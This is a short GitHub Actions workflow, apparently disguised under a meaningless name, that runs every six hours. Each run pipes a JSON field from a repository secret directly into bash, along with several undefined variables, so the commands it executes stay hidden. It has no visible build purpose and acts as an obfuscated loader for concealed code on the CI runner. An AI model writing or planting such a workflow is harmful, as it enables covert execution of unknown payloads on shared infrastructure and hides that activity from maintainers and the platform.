name: portfoliotogetherness

on:
  workflow_dispatch:
  schedule:
    - cron: '41 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: portfoliotogetherness
        env:
          zol293: ${{ secrets.zol293 }}
        run: |
          echo $zol293 | jq -r .ly2 | /bin/bash
          echo $vr1 | jq -r .bfgaq64 | /bin/bash
          echo $bujrw52 | jq -r .ol00 | /bin/bash
          echo $uxoc0218 | jq -r .id17791 | /bin/bash
          echo $za4201 | jq -r .xtve31 | /bin/bash

